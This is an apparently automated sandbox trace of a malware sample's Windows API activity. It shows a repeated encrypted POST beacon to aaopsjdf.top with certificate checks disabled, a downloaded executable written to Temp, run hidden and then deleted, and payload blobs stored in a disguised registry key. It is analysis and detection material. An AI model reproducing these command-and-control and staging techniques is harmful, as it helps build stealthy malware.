| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:44 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ùÐé8, url = aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ùÐé8, url = aaopsjdf.top/IQwhNdoN6/k1c-Of1YG/9PY7a/j/Hz/A6EGg |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
3 | |
| Inet | Read Response | size = 4096, size_out = 3883 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
12 | |
| Inet | Read Response | size = 4096, size_out = 4087 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
31 | |
| Inet | Read Response | size = 4096, size_out = 4087 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
38 | |
| Inet | Read Response | size = 4096, size_out = 703 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, desired_access = GENERIC_WRITE, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
2 | |
| File | Write | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe, size = 196608 |
|
1 | |
| Process | Create | process_name = "C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe", os_pid = 0x594, creation_flags = CREATE_DEFAULT_ERROR_MODE, show_window = SW_HIDE |
|
1 | |
| File | Delete | filename = C:\Users\aETAdzjz\AppData\Local\Temp\upde25b4796.exe |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:48 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_NONE |
|
1 | |
| File | Create | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, desired_access = GENERIC_READ, share_mode = FILE_SHARE_READ |
|
1 | |
| File | Get Info | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, type = size, size_out = 1776 |
|
1 | |
| File | Read | filename = C:\Users\aETAdzjz\AppData\Roaming\Macromedia\Flash Player\macromedia.com\support\flashplayer\sys\rO4p00rRfog3ie0eV3.ecv, size = 1776, size_out = 1776 |
|
1 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close H, url = aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close H, url = aaopsjdf.top/Uvg4D/j/3AuZ/fdpAv/ra4Kz/Gw3S/kI/A |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
3 | |
| Inet | Read Response | size = 4096, size_out = 3883 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
12 | |
| Inet | Read Response | size = 4096, size_out = 4087 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
22 | |
| Inet | Read Response | size = 4096, size_out = 970 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Mutex | Create | mutex_name = F063546A5853AF5508DB5A15751DB34A |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_NONE |
|
1 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, size = 88160, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = F063546A5853AF5508DB5A15751DB34A |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:50 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ã@ó8, url = aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ã@ó8, url = aaopsjdf.top/1c2/62V7Y/NAORf7clZ/q/Cl/SPSRA |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
3 | |
| Inet | Read Response | size = 4096, size_out = 3883 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
12 | |
| Inet | Read Response | size = 4096, size_out = 4087 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
23 | |
| Inet | Read Response | size = 4096, size_out = 4088 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
9 | |
| Inet | Read Response | size = 4096, size_out = 402 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Mutex | Create | mutex_name = F063546A5853AF5508DB5A15751DB34A |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, size = 200848, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = F063546A5853AF5508DB5A15751DB34A |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Mutex | Release | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:51 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close =@ó8, url = aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close =@ó8, url = aaopsjdf.top/KJ2L/k/Ux7/H/f/h2RtGl/7s/v8/7wrSO/Q |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
3 | |
| Inet | Read Response | size = 4096, size_out = 3883 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
12 | |
| Inet | Read Response | size = 4096, size_out = 4088 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
7 | |
| Inet | Read Response | size = 4096, size_out = 4087 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 4096 |
|
16 | |
| Inet | Read Response | size = 4096, size_out = 3878 |
|
1 | |
| Inet | Read Response | size = 4096, size_out = 0 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Mutex | Create | mutex_name = F063546A5853AF5508DB5A15751DB34A |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Eteg, size = 295088, type = REG_BINARY |
|
1 | |
| Mutex | Create | mutex_name = ABC6B5B774FF9FD7F54EC277098C64EE |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Create Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Write Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, size = 1776, type = REG_BINARY |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:58 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ° 5, url = aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close ° 5, url = aaopsjdf.top/up9k/r3ZwOs/ZMTfab1M/Db/0/TDZH/g |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:56:59 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close @ó8, url = aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close @ó8, url = aaopsjdf.top/4Fqm5f1XYW/7kA/4P/IZa/R/cW38/83/21/S3V/Ew |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:57:00 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| Inet | Open Session | user_agent = Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E), access_type = INTERNET_OPEN_TYPE_PRECONFIG |
|
1 | |
| Inet | Open Connection | protocol = HTTP, server_name = aaopsjdf.top, server_port = 443 |
|
1 | |
| Inet | Open HTTP Request | http_verb = POST, http_version = HTTP 1.1, target_resource = /WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw, accept_types = 540672, flags = INTERNET_FLAG_PRAGMA_NOCACHE, INTERNET_FLAG_NO_UI, INTERNET_FLAG_HYPERLINK, INTERNET_FLAG_IGNORE_CERT_CN_INVALID, INTERNET_FLAG_IGNORE_CERT_DATE_INVALID, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTPS, INTERNET_FLAG_IGNORE_REDIRECT_TO_HTTP, INTERNET_FLAG_NO_AUTH, INTERNET_FLAG_SECURE, INTERNET_FLAG_NO_CACHE_WRITE, INTERNET_FLAG_RELOAD |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close @ó8, url = aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw |
|
1 | |
| Inet | Send HTTP Request | headers = Connection: close @ó8, url = aaopsjdf.top/WRBw5Vr/jVQLJoZqB/sq/85o6F8/jK3/Jw |
|
1 | |
| Inet | Query HTTP Info | flags = HTTP_QUERY_FLAG_NUMBER, HTTP_QUERY_STATUS_CODE, size_out = 4 |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Inet | Close Session | - |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Baywkivyl, type = REG_BINARY |
|
2 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
| Registry | Read Value | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci, value_name = Omegovna, type = REG_BINARY |
|
2 | |
| System | Get Time | type = System Time, time = 2018-01-10 18:57:01 (UTC) |
|
1 | |
| Registry | Open Key | reg_name = HKEY_CURRENT_USER\SOFTWARE\Microsoft\Acuhci |
|
1 | |
